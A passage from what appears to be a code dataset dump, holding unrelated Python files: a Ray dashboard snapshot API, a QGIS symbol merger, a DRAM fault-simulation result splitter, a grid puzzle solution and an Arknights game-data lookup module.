dict(zip(keys, vals))\n return new_dict\n # END\n\n\n","sub_path":"python/Hexlet/Practice2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"517027422","text":"import asyncio\nimport concurrent.futures\nfrom datetime import datetime\nimport enum\nimport logging\nimport json\nimport os\nfrom typing import Dict, Optional\n\nimport aiohttp.web\nfrom pydantic import BaseModel, Extra, Field, validator\n\nimport ray\nfrom ray.dashboard.consts import RAY_CLUSTER_ACTIVITY_HOOK\nimport ray.dashboard.optional_utils as dashboard_optional_utils\nimport ray.dashboard.utils as dashboard_utils\nfrom ray._private.storage import _load_class\nfrom ray.core.generated import gcs_pb2, gcs_service_pb2, gcs_service_pb2_grpc\nfrom ray.dashboard.modules.job.common import JOB_ID_METADATA_KEY, JobInfoStorageClient\n\nfrom ray.job_submission import JobInfo\nfrom ray.runtime_env import RuntimeEnv\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nroutes = dashboard_optional_utils.ClassMethodRouteTable\n\nSNAPSHOT_API_TIMEOUT_SECONDS = 30\n\n\nclass RayActivityStatus(str, enum.Enum):\n ACTIVE = \"ACTIVE\"\n INACTIVE = \"INACTIVE\"\n ERROR = \"ERROR\"\n\n\nclass RayActivityResponse(BaseModel, extra=Extra.allow):\n \"\"\"\n Pydantic model used to inform if a particular Ray component can be considered\n active, and metadata about observation.\n \"\"\"\n\n is_active: RayActivityStatus = Field(\n ...,\n description=(\n \"Whether the corresponding Ray component is considered active or inactive, \"\n \"or if there was an error while collecting this observation.\"\n ),\n )\n reason: Optional[str] = Field(\n None, description=\"Reason if Ray component is considered active or errored.\"\n )\n timestamp: float = Field(\n ...,\n description=(\n \"Timestamp of when this observation about the Ray component was made. \"\n \"This is in the format of seconds since unix epoch.\"\n ),\n )\n last_activity_at: Optional[float] = Field(\n None,\n description=(\n \"Timestamp when last actvity of this Ray component finished in format of \"\n \"seconds since unix epoch. 
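An aside on the `task` helper just above: padding `vals` with `None`s by hand works, but `itertools.zip_longest` expresses the same key/value pairing more directly. A sketch, with one behavioral caveat noted in the comments:

```python
from itertools import zip_longest

def task(keys, vals):
    # zip_longest pads the shorter sequence with fillvalue (None by
    # default), matching the manual extend-with-None above.  Caveat:
    # unlike the original, surplus *values* would also survive here,
    # showing up under a None key, so this fits the keys >= vals case.
    return dict(zip_longest(keys, vals))

print(task(["a", "b", "c", "d", "e"], [1, 2, 3]))
# {'a': 1, 'b': 2, 'c': 3, 'd': None, 'e': None}
```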
This field does not need to be populated \"\n \"for Ray components where it is not meaningful.\"\n ),\n )\n\n @validator(\"reason\", always=True)\n def reason_required(cls, v, values, **kwargs):\n if \"is_active\" in values and values[\"is_active\"] != RayActivityStatus.INACTIVE:\n if v is None:\n raise ValueError(\n 'Reason is required if is_active is \"active\" or \"error\"'\n )\n return v\n\n\nclass APIHead(dashboard_utils.DashboardHeadModule):\n def __init__(self, dashboard_head):\n super().__init__(dashboard_head)\n self._gcs_job_info_stub = None\n self._gcs_actor_info_stub = None\n self._dashboard_head = dashboard_head\n self._gcs_aio_client = dashboard_head.gcs_aio_client\n self._job_info_client = None\n # For offloading CPU intensive work.\n self._thread_pool = concurrent.futures.ThreadPoolExecutor(\n max_workers=2, thread_name_prefix=\"api_head\"\n )\n\n @routes.get(\"/api/actors/kill\")\n async def kill_actor_gcs(self, req) -> aiohttp.web.Response:\n actor_id = req.query.get(\"actor_id\")\n force_kill = req.query.get(\"force_kill\", False) in (\"true\", \"True\")\n no_restart = req.query.get(\"no_restart\", False) in (\"true\", \"True\")\n if not actor_id:\n return dashboard_optional_utils.rest_response(\n success=False, message=\"actor_id is required.\"\n )\n\n request = gcs_service_pb2.KillActorViaGcsRequest()\n request.actor_id = bytes.fromhex(actor_id)\n request.force_kill = force_kill\n request.no_restart = no_restart\n await self._gcs_actor_info_stub.KillActorViaGcs(\n request, timeout=SNAPSHOT_API_TIMEOUT_SECONDS\n )\n\n message = (\n f\"Force killed actor with id {actor_id}\"\n if force_kill\n else f\"Requested actor with id {actor_id} to terminate. \"\n + \"It will exit once running tasks complete\"\n )\n\n return dashboard_optional_utils.rest_response(success=True, message=message)\n\n @routes.get(\"/api/snapshot\")\n async def snapshot(self, req):\n timeout = req.query.get(\"timeout\", None)\n if timeout and timeout.isdigit():\n timeout = int(timeout)\n else:\n timeout = SNAPSHOT_API_TIMEOUT_SECONDS\n\n actor_limit = int(req.query.get(\"actor_limit\", \"1000\"))\n (job_info, job_submission_data, actor_data) = await asyncio.gather(\n self.get_job_info(timeout),\n self.get_job_submission_info(timeout),\n self.get_actor_info(actor_limit, timeout),\n )\n snapshot = {\n \"jobs\": job_info,\n \"job_submission\": job_submission_data,\n \"actors\": actor_data,\n \"session_name\": self._dashboard_head.session_name,\n \"ray_version\": ray.__version__,\n \"ray_commit\": ray.__commit__,\n }\n return dashboard_optional_utils.rest_response(\n success=True, message=\"hello\", snapshot=snapshot\n )\n\n @routes.get(\"/api/component_activities\")\n async def get_component_activities(self, req) -> aiohttp.web.Response:\n timeout = req.query.get(\"timeout\", None)\n if timeout and timeout.isdigit():\n timeout = int(timeout)\n else:\n timeout = SNAPSHOT_API_TIMEOUT_SECONDS\n\n # Get activity information for driver\n driver_activity_info = await self._get_job_activity_info(timeout=timeout)\n resp = {\"driver\": dict(driver_activity_info)}\n\n if RAY_CLUSTER_ACTIVITY_HOOK in os.environ:\n try:\n cluster_activity_callable = _load_class(\n os.environ[RAY_CLUSTER_ACTIVITY_HOOK]\n )\n external_activity_output = cluster_activity_callable()\n assert isinstance(external_activity_output, dict), (\n f\"Output of hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]} \"\n \"should be Dict[str, RayActivityResponse]. 
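The `reason_required` validator above reads already-validated sibling fields through `values`. The same pydantic pattern in a standalone example — this is the v1 `@validator` API used in this file, which pydantic v2 renamed to `field_validator`:

```python
from typing import Optional
from pydantic import BaseModel, validator

class Observation(BaseModel):
    is_active: bool
    reason: Optional[str] = None

    @validator("reason", always=True)
    def reason_required(cls, v, values):
        # `values` holds the previously validated fields, so is_active is
        # visible here; always=True runs even when reason is omitted.
        if values.get("is_active") and v is None:
            raise ValueError("reason is required when is_active is True")
        return v

print(Observation(is_active=False))  # ok: reason stays None
# Observation(is_active=True)       # would raise a ValidationError
```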
Got \"\n f\"output: {external_activity_output}\"\n )\n for component_type in external_activity_output:\n try:\n component_activity_output = external_activity_output[\n component_type\n ]\n # Parse and validate output to type RayActivityResponse\n component_activity_output = RayActivityResponse(\n **dict(component_activity_output)\n )\n resp[component_type] = dict(component_activity_output)\n except Exception as e:\n logger.exception(\n f\"Failed to get activity status of {component_type} \"\n f\"from user hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]}.\"\n )\n resp[component_type] = {\n \"is_active\": RayActivityStatus.ERROR,\n \"reason\": repr(e),\n \"timestamp\": datetime.now().timestamp(),\n }\n except Exception as e:\n logger.exception(\n \"Failed to get activity status from user \"\n f\"hook {os.environ[RAY_CLUSTER_ACTIVITY_HOOK]}.\"\n )\n resp[\"external_component\"] = {\n \"is_active\": RayActivityStatus.ERROR,\n \"reason\": repr(e),\n \"timestamp\": datetime.now().timestamp(),\n }\n\n return aiohttp.web.Response(\n text=json.dumps(resp),\n content_type=\"application/json\",\n status=aiohttp.web.HTTPOk.status_code,\n )\n\n async def _get_job_activity_info(self, timeout: int) -> RayActivityResponse:\n # Returns if there is Ray activity from drivers (job).\n # Drivers in namespaces that start with _ray_internal_ are not\n # considered activity.\n # This includes the _ray_internal_dashboard job that gets automatically\n # created with every cluster\n try:\n request = gcs_service_pb2.GetAllJobInfoRequest()\n reply = await self._gcs_job_info_stub.GetAllJobInfo(\n request, timeout=timeout\n )\n\n num_active_drivers = 0\n latest_job_end_time = 0\n for job_table_entry in reply.job_info_list:\n is_dead = bool(job_table_entry.is_dead)\n in_internal_namespace = job_table_entry.config.ray_namespace.startswith(\n \"_ray_internal_\"\n )\n latest_job_end_time = (\n max(latest_job_end_time, job_table_entry.end_time)\n if job_table_entry.end_time\n else latest_job_end_time\n )\n if not is_dead and not in_internal_namespace:\n num_active_drivers += 1\n\n current_timestamp = datetime.now().timestamp()\n # Latest job end time must be before or equal to the current timestamp.\n # Job end times may be provided in epoch milliseconds. 
Check if this\n # is true, and convert to seconds\n if latest_job_end_time > current_timestamp:\n latest_job_end_time = latest_job_end_time / 1000\n assert current_timestamp >= latest_job_end_time, (\n f\"Most recent job end time {latest_job_end_time} must be \"\n f\"before or equal to the current timestamp {current_timestamp}\"\n )\n\n is_active = (\n RayActivityStatus.ACTIVE\n if num_active_drivers > 0\n else RayActivityStatus.INACTIVE\n )\n return RayActivityResponse(\n is_active=is_active,\n reason=f\"Number of active drivers: {num_active_drivers}\"\n if num_active_drivers\n else None,\n timestamp=current_timestamp,\n # If latest_job_end_time == 0, no jobs have finished yet so don't\n # populate last_activity_at\n last_activity_at=latest_job_end_time if latest_job_end_time else None,\n )\n except Exception as e:\n logger.exception(\"Failed to get activity status of Ray drivers.\")\n return RayActivityResponse(\n is_active=RayActivityStatus.ERROR,\n reason=repr(e),\n timestamp=datetime.now().timestamp(),\n )\n\n async def _get_job_info(self, metadata: Dict[str, str]) -> Optional[JobInfo]:\n # If a job submission ID has been added to a job, the status is\n # guaranteed to be returned.\n job_submission_id = metadata.get(JOB_ID_METADATA_KEY)\n return await self._job_info_client.get_info(job_submission_id)\n\n async def get_job_info(self, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS):\n \"\"\"Return info for each job. Here a job is a Ray driver.\"\"\"\n request = gcs_service_pb2.GetAllJobInfoRequest()\n reply = await self._gcs_job_info_stub.GetAllJobInfo(request, timeout=timeout)\n\n jobs = {}\n for job_table_entry in reply.job_info_list:\n job_id = job_table_entry.job_id.hex()\n metadata = dict(job_table_entry.config.metadata)\n config = {\n \"namespace\": job_table_entry.config.ray_namespace,\n \"metadata\": metadata,\n \"runtime_env\": RuntimeEnv.deserialize(\n job_table_entry.config.runtime_env_info.serialized_runtime_env\n ),\n }\n info = await self._get_job_info(metadata)\n entry = {\n \"status\": None if info is None else info.status,\n \"status_message\": None if info is None else info.message,\n \"is_dead\": job_table_entry.is_dead,\n \"start_time\": job_table_entry.start_time,\n \"end_time\": job_table_entry.end_time,\n \"config\": config,\n }\n jobs[job_id] = entry\n\n return jobs\n\n async def get_job_submission_info(\n self, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS\n ):\n \"\"\"Info for Ray job submission. 
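The milliseconds-versus-seconds heuristic described here — a timestamp that lands in the future when read as seconds is assumed to be epoch milliseconds — in isolated, testable form:

```python
import time

def normalize_epoch_seconds(ts: float) -> float:
    """If ts looks like epoch milliseconds (implausibly far in the
    future when read as seconds), convert it to seconds."""
    return ts / 1000 if ts > time.time() else ts

print(normalize_epoch_seconds(1_700_000_000))      # already seconds
print(normalize_epoch_seconds(1_700_000_000_000))  # milliseconds -> seconds
```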
Here a job can have 0 or many drivers.\"\"\"\n\n jobs = {}\n fetched_jobs = await self._job_info_client.get_all_jobs(timeout)\n for (\n job_submission_id,\n job_info,\n ) in fetched_jobs.items():\n if job_info is not None:\n entry = {\n \"job_submission_id\": job_submission_id,\n \"status\": job_info.status,\n \"message\": job_info.message,\n \"error_type\": job_info.error_type,\n \"start_time\": job_info.start_time,\n \"end_time\": job_info.end_time,\n \"metadata\": job_info.metadata,\n \"runtime_env\": job_info.runtime_env,\n \"entrypoint\": job_info.entrypoint,\n }\n jobs[job_submission_id] = entry\n return jobs\n\n async def get_actor_info(\n self, limit: int = 1000, timeout: int = SNAPSHOT_API_TIMEOUT_SECONDS\n ):\n # TODO (Alex): GCS still needs to return actors from dead jobs.\n request = gcs_service_pb2.GetAllActorInfoRequest()\n request.show_dead_jobs = True\n request.limit = limit\n reply = await self._gcs_actor_info_stub.GetAllActorInfo(\n request, timeout=timeout\n )\n actors = {}\n for actor_table_entry in reply.actor_table_data:\n actor_id = actor_table_entry.actor_id.hex()\n runtime_env = json.loads(actor_table_entry.serialized_runtime_env)\n entry = {\n \"job_id\": actor_table_entry.job_id.hex(),\n \"state\": gcs_pb2.ActorTableData.ActorState.Name(\n actor_table_entry.state\n ),\n \"name\": actor_table_entry.name,\n \"namespace\": actor_table_entry.ray_namespace,\n \"runtime_env\": runtime_env,\n \"start_time\": actor_table_entry.start_time,\n \"end_time\": actor_table_entry.end_time,\n \"is_detached\": actor_table_entry.is_detached,\n \"resources\": dict(actor_table_entry.required_resources),\n \"actor_class\": actor_table_entry.class_name,\n \"current_worker_id\": actor_table_entry.address.worker_id.hex(),\n \"current_raylet_id\": actor_table_entry.address.raylet_id.hex(),\n \"ip_address\": actor_table_entry.address.ip_address,\n \"port\": actor_table_entry.address.port,\n \"metadata\": dict(),\n }\n actors[actor_id] = entry\n\n return actors\n\n async def run(self, server):\n self._gcs_job_info_stub = gcs_service_pb2_grpc.JobInfoGcsServiceStub(\n self._dashboard_head.aiogrpc_gcs_channel\n )\n self._gcs_actor_info_stub = gcs_service_pb2_grpc.ActorInfoGcsServiceStub(\n self._dashboard_head.aiogrpc_gcs_channel\n )\n # Lazily constructed because dashboard_head's gcs_aio_client\n # is lazily constructed\n if not self._job_info_client:\n self._job_info_client = JobInfoStorageClient(\n self._dashboard_head.gcs_aio_client\n )\n\n @staticmethod\n def is_minimal_module():\n return False\n","sub_path":"dashboard/modules/snapshot/snapshot_head.py","file_name":"snapshot_head.py","file_ext":"py","file_size_in_byte":15619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"203225084","text":"#!/env/python\n#\n# merge-symbols: merge geologic symbols into a single library. 
\n#\n# (c) 2019 Alessandro Frigeri, Istituto di Astrofisica e Planetologia Spaziali - INAF - Rome\n#\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element, SubElement, Comment, ElementTree\nimport os,sys\nfrom xml.dom import minidom\nimport glob\nfrom pytablewriter import MarkdownTableWriter\nimport datetime\n\nwriter = MarkdownTableWriter()\nstatus_header = \"# Table of symbols, updated \"+datetime.date.today().strftime(\"%B %d, %Y\")+\"\\n\"\nwriter.table_name = \"\"\nwriter.headers = [\"Authority\", \"code\", \"description\", \"notes\"]\nwriter.value_matrix = []\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n j = \"\\n\" + (level-1)*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for subelem in elem:\n indent(subelem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = j\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = j\n return elem\n\ndef name_parser(name):\n '''\n name convention:\n \n [name or id] : [ description ]\n '''\n return name.split(':')\n\nsrcdir = sys.argv[1]\ndst = sys.argv[2] \n\ntop = ET.Element('qgis_style', version=\"1\")\ncomment = ET.Comment('geologic symbols for QGis')\ntop.append(comment)\n\nsymbols = ET.SubElement(top, 'symbols')\n\ncount_dict = {}\n\nstatus_file = open('../STATUS.md','w') \n\nfor rootdir, dirs, files in os.walk( srcdir ): \n for filename in files:\n if filename.endswith(\".xml\"): \n xmlfile = os.path.join(rootdir, filename)\n auth = os.path.dirname( xmlfile ).split('/')[-1]\n if auth not in count_dict.keys():\n count_dict[auth] = 0\n tree = ET.parse( xmlfile )\n root = tree.getroot()\n if root.findall(\"./symbols/symbol\"):\n for symbol in root.findall(\"./symbols/symbol\"): \n symbol.attrib['tags'] = auth+',geology'\n n = (symbol.attrib['name'])\n print(n)\n c,d = name_parser( n )\n symbols.append(symbol)\n count_dict[auth] += 1\n writer.value_matrix.append([auth,str(c),d,''])\n \n if root.findall(\"./colorramps/colorramp\"):\n colorramps = ET.SubElement(top, 'colorramps')\n for colorramp in root.findall(\"./colorramps/colorramp\"):\n colorramp.attrib['tags'] = auth+',geology'\n n = colorramp.attrib['name']\n c,d = name_parser( n )\n colorramps.append(colorramp)\n count_dict[auth] += 1\n writer.value_matrix.append([auth,str(c),d,''])\n\nElementTree(indent(top)).write(dst)\nwriter.value_matrix.sort()\nwriter.write_table()\nstatus_file.write(status_header)\nstatus_file.write(\"There are:\\n\") \nfor k in count_dict.keys():\n status_file.write(\" * %d entries for %s.\\n\"%(count_dict[k],k)) \nstatus_file.write(\"\\n\") \n\nstatus_file.write(writer.dumps()) \nstatus_file.close()\nprint(count_dict)\n","sub_path":"src/scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"98991782","text":"import pandas as pd\nimport sys\nimport subprocess\n\n\ndef comp_run(file_name,iterations):\n try:\n f_out = open(\"comp_f.csv\",\"w\")\n c_out = open(\"comp_c.csv\",\"w\")\n s_out = open(\"comp_s.csv\",\"w\")\n f_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank\\n\")\n 
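For reference, the build-and-pretty-print flow that `merge.py` implements above reduces to a few lines on Python 3.9+, where `ET.indent` is in the standard library (the script ships its own `indent` for older interpreters). The symbol attributes below are made-up sample values:

```python
import xml.etree.ElementTree as ET

top = ET.Element("qgis_style", version="1")
top.append(ET.Comment("geologic symbols for QGis"))
symbols = ET.SubElement(top, "symbols")
ET.SubElement(symbols, "symbol", name="GSC:1001", tags="GSC,geology")

ET.indent(top)  # stdlib pretty-printer (Python 3.9+)
print(ET.tostring(top, encoding="unicode"))
```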
c_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank\\n\")\n s_out.write(\"dram_module,sim_num,sim_stat,trans_1bit,trans_1word,trans_1col,trans_1row,trans_1bank,trans_nbank,trans_nrank,\"\n +\"perm_1bit,perm_1word,perm_1col,perm_1row,perm_1bank,perm_nbank,perm_nrank,the_straw\\n\")\n f_out.close()\n c_out.close()\n s_out.close()\n\n file_path = \"../configs/\"+file_name\n\n for i in range(0,iterations):\n subprocess.run([\"../faultsim\",\"--configfile\",file_path,\"--outfile\",\"out.txt\"])\n df = pd.read_csv(\"synop.csv\")\n dft = df.iloc[:,:17]\n dff = dft.loc[df['sim_stat'] == 2]\n dfc = dft.loc[df['sim_stat'] == 1]\n dfs = df.loc[df['the_straw'] >= 0]\n dff.to_csv(\"comp_f.csv\",mode=\"a\",index=False,header=False)\n dfc.to_csv(\"comp_c.csv\",mode=\"a\",index=False,header=False)\n dfs.to_csv(\"comp_s.csv\",mode=\"a\",index=False,header=False)\n finally:\n f_out.close()\n c_out.close()\n s_out.close()\n\n","sub_path":"scripts/data_comp.py","file_name":"data_comp.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"90939252","text":"import sys\r\nfrom sys import stdin\r\nsys.setrecursionlimit(10000)\r\ninput = stdin.readline\r\n\r\n\r\ndef solution1():\r\n R, C = map(int, input().split())\r\n dx, dy = [1, 0, -1, 0], [0, 1, 0, -1]\r\n\r\n farm = [list(map(str, input().strip())) for _ in range(R)]\r\n\r\n doom = False\r\n\r\n for row in range(R):\r\n for col in range(C):\r\n if farm[row][col] == \"W\":\r\n for i in range(4):\r\n new_x, new_y = row + dx[i], col + dy[i]\r\n if new_x < 0 or new_y < 0 or new_x == R or new_y == C:\r\n continue\r\n if farm[new_x][new_y] == \"S\":\r\n doom = True\r\n elif farm[new_x][new_y] == \".\":\r\n farm[new_x][new_y] = \"D\"\r\n\r\n\r\n if doom:\r\n print(0)\r\n else:\r\n print(1)\r\n for i in farm:\r\n print(\"\".join(i))\r\n\r\n\r\ndef solution2():\r\n R, C = map(int, input().split())\r\n dx, dy = [1, 0, -1, 0], [0, 1, 0, -1]\r\n\r\n farm = [list(map(str, input().strip())) for _ in range(R)]\r\n\r\n doom = False\r\n\r\n for row in range(R):\r\n for col in range(C):\r\n if farm[row][col] == \"W\":\r\n for w in range(4):\r\n new_row, new_col = row + dx[w], col + dy[w]\r\n if new_row < 0 or new_row == R or new_col < 0 or new_col == C:\r\n continue\r\n if farm[new_row][new_col] == \"S\":\r\n doom = True\r\n\r\n if doom:\r\n print(0)\r\n else:\r\n print(1)\r\n for i in range(R):\r\n for j in range(C):\r\n if farm[i][j] not in 'SW':\r\n farm[i][j] = 'D'\r\n \r\n for i in farm:\r\n print(''.join(i))\r\n \r\n\r\nif __name__ == '__main__': \r\n # solution1()\r\n solution2()\r\n ","sub_path":"백준/Silver/16956. 
늑대와 양/늑대와 양.py","file_name":"늑대와 양.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242358805","text":"\"\"\"\r\nArknights data parsing\r\nReturn logic for every function: Get the value with highest Levenshtein Distance between input and name, ID (or code, appellation)\r\n\"\"\"\r\n\r\nimport json\r\nimport logging\r\nimport random\r\nfrom typing import List, Optional, Tuple\r\n\r\nimport requests\r\n# Fuzzy String Matching\r\nfrom fuzzywuzzy.fuzz import ratio\r\n\r\nfrom amiya.utils import constants\r\n\r\nlocale = 'en-US'\r\n\r\n\r\ndef fetch(url: str) -> dict:\r\n \"\"\"\r\n Grabs json data from Github link\r\n\r\n Args:\r\n url (str): Github raw file url\r\n\r\n Returns:\r\n dict: A json that contains the results\r\n \"\"\"\r\n\r\n # Using requests to fetch data\r\n data = requests.get(url)\r\n\r\n # If an error occurred during fetching\r\n if data.status_code != 200:\r\n logging.error(\"Fetching failed\")\r\n return None\r\n\r\n # Parses data to json (dict)\r\n data = data.json()\r\n return data\r\n\r\n\r\noperator_table = None\r\n\r\n\r\ndef get_operator_info(operator: str) -> dict:\r\n \"\"\"\r\n Grabs operator detailed info (search by name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n dict: A json that contains the operator info with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n global operator_table\r\n # Check if operator_table is already loaded and load it from local file\r\n if operator_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/character_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n operator_table = json.load(f)\r\n\r\n return max(\r\n list(operator_table.items()),\r\n key=lambda x: max(\r\n # Match ID\r\n ratio(x[0], operator),\r\n # Match name\r\n ratio(x[1][\"name\"], operator),\r\n # Match appellation\r\n ratio(x[1][\"appellation\"] or \"\", operator),\r\n ),\r\n )\r\n\r\n\r\nhandbook_info_table = None\r\n\r\n\r\ndef get_operator_file(operator: str) -> Tuple[str, dict]:\r\n \"\"\"\r\n Grabs operator's detailed file (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n Tuple[str, dict]: A tuple contains a str denote the operator's name and dict that contains the operator profile with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator id\r\n char_id = info[0]\r\n\r\n # Check if handbook_info_table is already loaded and load it from local file\r\n global handbook_info_table\r\n if handbook_info_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/handbook_info_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n handbook_info_table = json.load(f)\r\n\r\n # Get operator profile\r\n return (info[1][\"name\"], handbook_info_table[\"handbookDict\"][char_id])\r\n\r\n\r\ncharword_table = None\r\n\r\n\r\ndef get_operator_audio(operator: str) -> Tuple[str, List[dict]]:\r\n \"\"\"\r\n Grabs operator's voice records (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n Tuple[str, List[dict]]: A tuple contains a str denote the operator's name and a list of dict that contains the operator's audio records with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for 
operator\r\n info = get_operator_info(operator)\r\n\r\n # Get default skin ID\r\n char_id = info[0]\r\n\r\n # Check if charword_table is already loaded and load it from local file\r\n global charword_table\r\n if charword_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/charword_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n charword_table = json.load(f)\r\n\r\n # Get voice records\r\n return (info[1][\"name\"], sorted([voice for voice in charword_table.values() if voice[\"charId\"] == char_id], key=lambda voice: voice[\"voiceIndex\"]))\r\n\r\n\r\nskin_table = None\r\n\r\n\r\ndef get_operator_skins(operator: str) -> List[dict]:\r\n \"\"\"\r\n Grabs operator's skins detailed infos (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n List[dict]: A list of dict that contains the operator's skins with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator ID\r\n char_id = info[0]\r\n\r\n # Check if skin_table is already loaded and load it from local file\r\n global skin_table\r\n if skin_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/skin_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n skin_table = json.load(f)\r\n\r\n # Get list of operator skins mapped by skin ID\r\n skin_list = skin_table[\"charSkins\"]\r\n return [skin for skin in skin_list.values() if skin[\"charId\"] == char_id]\r\n\r\n\r\nskill_table = None\r\n\r\n\r\ndef get_operator_skills(operator: str) -> List[dict]:\r\n \"\"\"\r\n Grabs operator skills detailed infos (search by operator name, ID or appellation)\r\n\r\n Args:\r\n operator (str): Operator name, ID or appellation\r\n\r\n Returns:\r\n List[dict]: A list of tuple (skill from character_table, skill from skill_table) that contains the operator skills with ID, name or appellation that matches the parameter\r\n \"\"\"\r\n\r\n # Search for operator\r\n info = get_operator_info(operator)\r\n\r\n # Get operator skills\r\n skills = info[1][\"skills\"]\r\n\r\n # Check if skill_table is already loaded and load it from local file\r\n global skill_table\r\n if skill_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/skill_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n skill_table = json.load(f)\r\n\r\n # Return a list of tuple with skill info from operator_table and skill_table\r\n # As for why, the skill data from 2 tables are different but both useful\r\n return [(skill, skill_table[skill[\"skillId\"]]) for skill in skills]\r\n\r\n\r\nhidden_table = None\r\n\r\n\r\ndef get_operator_by_tags(tags: list) -> List[dict]:\r\n \"\"\"\r\n Grabs operators that contains given tags\r\n\r\n Args:\r\n tags (list): The input tags list (input must be correct)\r\n\r\n Returns:\r\n List[dict]: A list of dict that contains operator's name, position (Ranged or Melee), tag list. 
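Every lookup helper in this module shares one idiom: take `max` over the whole table with a key that is the best fuzzy `ratio` across several candidate fields. In isolation, with a two-entry toy table (fuzzywuzzy assumed installed):

```python
from fuzzywuzzy.fuzz import ratio

operators = {
    "char_002": {"name": "Amiya", "appellation": "Amiya"},
    "char_003": {"name": "Exusiai", "appellation": "Exusiai"},
}

query = "amya"  # tolerate user typos
best_id, best = max(
    operators.items(),
    key=lambda kv: max(
        ratio(kv[0], query),                 # match ID
        ratio(kv[1]["name"], query),         # match name
        ratio(kv[1]["appellation"], query),  # match appellation
    ),
)
print(best_id, best["name"])  # char_002 Amiya
```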
rarity and profession\r\n \"\"\"\r\n\r\n url = \"https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/json/akhr.json\"\r\n # Check if operator_table and hidden_table is already loaded and load it\r\n # from local file or fetch it\r\n global operator_table, hidden_table\r\n if operator_table is None:\r\n with open(f\"ArknightsData/{locale}/gamedata/excel/character_table.json\", \"r\", encoding=\"UTF-8\") as f:\r\n operator_table = json.load(f)\r\n if hidden_table is None:\r\n hidden_table = fetch(url)\r\n\r\n # As the operator_table doesn't actually show which operator we can't get from recruitment, we need Aceship's akhr file to check\r\n # Even though in character_table.json there's a key named\r\n # \"itemOptainApproach\", I don't use it to check because it's faulty (?) as\r\n # Indra is supposed to be a Recruitment only operator but it shows\r\n # \"Recruitment & Headhunting\" in her \"itemOptainApproach\"\r\n hidden_list = [{x[\"name\"]: x[\"hidden\"]} for x in hidden_table]\r\n\r\n # The actual work\r\n operator_list = [\r\n # Grabbing only what we need\r\n {key: x[key]\r\n for key in [\"name\", \"position\", \"tagList\", \"rarity\", \"profession\"]}\r\n for x in operator_table.values()\r\n if (\r\n (\r\n # Check for common tags\r\n x[\"tagList\"] is not None\r\n and (set([i.lower() for i in x[\"tagList\"]]) & set(tags))\r\n )\r\n # Check for position\r\n or x[\"position\"].lower() in tags\r\n # Check for profession\r\n or constants.PROFESSION_TABLE[x[\"profession\"]].lower() in tags\r\n # Check for Senior or Top Operator by rarity (0-indexed)\r\n or (\"senior operator\" in tags and x[\"rarity\"] == 4)\r\n or (\"top operator\" in tags and x[\"rarity\"] == 5)\r\n )\r\n # If operator is not in hidden_list, that means we can obtain through\r\n # Recruitment\r\n and {x[\"name\"]: False} in hidden_list\r\n ]\r\n\r\n # Append the remaining tags as the tagList doesn't contain position,\r\n # profession or rarity\r\n for operator in operator_list:\r\n operator[\"tagList\"].append(operator.pop(\"position\", None).title())\r\n operator[\"tagList\"].append(\r\n constants.PROFESSION_TABLE[operator.pop(\r\n \"profession\", None)].title()\r\n )\r\n if operator[\"rarity\"] == 4:\r\n operator[\"tagList\"].append(\"Senior Operator\")\r\n if operator[\"rarity\"] == 5:\r\n operator[\"tagList\"].append(\"Top Operator\")\r\n\r\n return 